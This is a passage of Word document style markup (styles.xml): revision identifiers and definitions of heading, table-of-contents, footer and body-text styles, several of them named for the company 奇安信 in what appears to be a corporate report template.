    <w:rsid w:val="5F7E1A2B"/>
    <w:rsid w:val="5FEB6BB1"/>
    <w:rsid w:val="5FF11F12"/>
    <w:rsid w:val="5FF217E7"/>
    <w:rsid w:val="60D62EB6"/>
    <w:rsid w:val="615F221E"/>
    <w:rsid w:val="624201CC"/>
    <w:rsid w:val="633E1525"/>
    <w:rsid w:val="638B7F88"/>
    <w:rsid w:val="63DC3520"/>
    <w:rsid w:val="64803865"/>
    <w:rsid w:val="64EF09EB"/>
    <w:rsid w:val="65F4FDFD"/>
    <w:rsid w:val="66FC37C0"/>
    <w:rsid w:val="68951482"/>
    <w:rsid w:val="6A7A4A3B"/>
    <w:rsid w:val="6B217E4E"/>
    <w:rsid w:val="6B2D7B77"/>
    <w:rsid w:val="6C6B4DFB"/>
    <w:rsid w:val="6D262AD0"/>
    <w:rsid w:val="6D6D6950"/>
    <w:rsid w:val="6D911D26"/>
    <w:rsid w:val="6E3E721D"/>
    <w:rsid w:val="6EBF57DF"/>
    <w:rsid w:val="6F03131A"/>
    <w:rsid w:val="6FCA13C9"/>
    <w:rsid w:val="6FEF1281"/>
    <w:rsid w:val="70102C22"/>
    <w:rsid w:val="71EF8C02"/>
    <w:rsid w:val="73033B83"/>
    <w:rsid w:val="73A330CC"/>
    <w:rsid w:val="771BBBA5"/>
    <w:rsid w:val="7753A740"/>
    <w:rsid w:val="78A774AA"/>
    <w:rsid w:val="798017B9"/>
    <w:rsid w:val="79A77E07"/>
    <w:rsid w:val="79E00282"/>
    <w:rsid w:val="7C06244A"/>
    <w:rsid w:val="7F0B4FA7"/>
    <w:rsid w:val="7F2D5F40"/>
    <w:rsid w:val="7F5F245D"/>
    <w:rsid w:val="7FF333B3"/>
    <w:rsid w:val="7FFF1278"/>
    <w:rsid w:val="7FFF229F"/>
    <w:rsid w:val="7FFFFFDE"/>
    <w:rsid w:val="9BFF0576"/>
    <w:rsid w:val="AD5F1129"/>
    <w:rsid w:val="B9DF8DD1"/>
    <w:rsid w:val="BDEE3A55"/>
    <w:rsid w:val="CAFB1CC1"/>
    <w:rsid w:val="CFDBADEC"/>
    <w:rsid w:val="D2B763D2"/>
    <w:rsid w:val="DEB6AA2A"/>
    <w:rsid w:val="DF73C4E6"/>
    <w:rsid w:val="DFF76DAA"/>
    <w:rsid w:val="F5FB0B5F"/>
    <w:rsid w:val="F77F4FBF"/>
    <w:rsid w:val="F7B21A65"/>
    <w:rsid w:val="F7F741D4"/>
    <w:rsid w:val="F8CF1461"/>
    <w:rsid w:val="F97D3DAA"/>
    <w:rsid w:val="FA6B0495"/>
    <w:rsid w:val="FAFA3DAB"/>
    <w:rsid w:val="FCDF57DA"/>
    <w:rsid w:val="FF1F5BD0"/>
    <w:rsid w:val="FF6B62A2"/>
    <w:rsid w:val="FFEE0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nhideWhenUsed="0" w:uiPriority="99" w:semiHidden="0"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line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="49"/>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50"/>
    <w:autoRedefine/>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51"/>
    <w:autoRedefine/>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52"/>
    <w:autoRedefine/>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91"/>
    <w:autoRedefine/>
    <w:semiHidden/>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78"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="64" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="22">
    <w:name w:val="Default Paragraph Font"/>
    <w:autoRedefine/>
    <w:semiHidden/>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8">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="102"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="840"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:ind w:left="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:iCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="27"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">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qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
      </w:tabs>
      <w:spacing w:before="120" w:after="120" w:line="400" w:lineRule="exact"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="630"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="15">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="71"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="16">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="500" w:lineRule="exact"/>
      <w:ind w:left="200" w:leftChars="100" w:hanging="100" w:hangingChars="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="17">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
      </w:tabs>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:ind w:left="210"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:smallCaps/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="18">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="53"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="19">
    <w:name w:val="Body Text First Indent"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="103"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="21">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="20"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
    <w:tblP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
  </w:style>
  <w:style w:type="character" w:styleId="23">
    <w:name w:val="page number"/>
    <w:basedOn w:val="22"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="24">
    <w:name w:val="Hyperlink"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="25">
    <w:name w:val="footnote reference"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="26">
    <w:name w:val="页眉 Char"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="27">
    <w:name w:val="页脚 Char1"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="11"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="28">
    <w:name w:val="页脚 字符1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="15"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="29">
    <w:name w:val="正文（奇安信）"/>
    <w:link w:val="48"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="30">
    <w:name w:val="正文首行缩进（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="100"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="50"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="31">
    <w:name w:val="标题 1（奇安信）"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="360" w:after="360" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="32">
    <w:name w:val="标题 2（奇安信）"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="33">
    <w:name w:val="标题 3（奇安信）"/>
    <w:basedOn w:val="4"/>
    <w:next w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="960"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="240" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:bCs w:val="0"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="34">
    <w:name w:val="目录-名称（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:sz w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="35">
    <w:name w:val="标题 4（奇安信）"/>
    <w:basedOn w:val="5"/>
    <w:next w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="120" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="36">
    <w:name w:val="标题 5（无编号）（奇安信）"/>
    <w:basedOn w:val="37"/>
    <w:next w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="37">
    <w:name w:val="保密申明（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="38">
    <w:name w:val="标题 5（有编号）（奇安信）"/>
    <w:basedOn w:val="6"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="39">
    <w:name w:val="标题 6（有编号）（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="120" w:line="300" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="40">
    <w:name w:val="表格内容靠左（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="41">
    <w:name w:val="页脚-页码（奇安信）"/>
    <w:basedOn w:val="11"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:firstLine="300"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="42">
    <w:name w:val="插图标注（奇安信）"/>
    <w:next w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="156"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Arial"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="43">
    <w:name w:val="表格标注（奇安信）"/>
    <w:basedOn w:val="42"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="44">
    <w:name w:val="页脚页码（奇安信）"/>
    <w:basedOn w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:framePr w:w="703" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="5598" w:y="247"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="45">
    <w:name w:val="封皮公司名（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:ind w:left="120" w:leftChars="50" w:right="120" w:rightChars="50"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="46">
    <w:name w:val="封皮主标题（奇安信）"/>
    <w:basedOn w:val="18"/>
    <w:next w:val="45"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="300" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Arial"/>
      <w:sz w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="47">
    <w:name w:val="表格-头（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="正文（奇安信） 字符"/>
    <w:link w:val="29"/>
    <w:qFormat/>
    <w:locked/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="标题 1 Char"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="3"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="4"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="标题 4 Char"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="5"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="标题 Char"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="页脚 Char"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="15"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="55">
    <w:name w:val="变更与声明加粗（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="56"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:ind w:left="50" w:leftChars="50" w:right="50" w:rightChars="50"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="56">
    <w:name w:val="变更与声明加粗（奇安信） 字符"/>
    <w:link w:val="55"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="57">
    <w:name w:val="变更与声明内容（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="25" w:beforeLines="25" w:after="25" w:afterLines="25" w:line="400" w:lineRule="exact"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="58">
    <w:name w:val="标题 0（奇安信）"/>
    <w:basedOn w:val="18"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="0" w:after="0" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Arial"/>
      <w:bCs w:val="0"/>
      <w:sz w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="59">
    <w:name w:val="目录 条目（奇安信）"/>
    <w:basedOn w:val="13"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="60">
    <w:name w:val="列表（编号一级）（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="25" w:beforeLines="25"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="文本字符强调（奇安信）"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
      <w:b/>
      <w:color w:val="auto"/>
      <w:sz w:val="21"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="62">
    <w:name w:val="列表（符号一级）（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
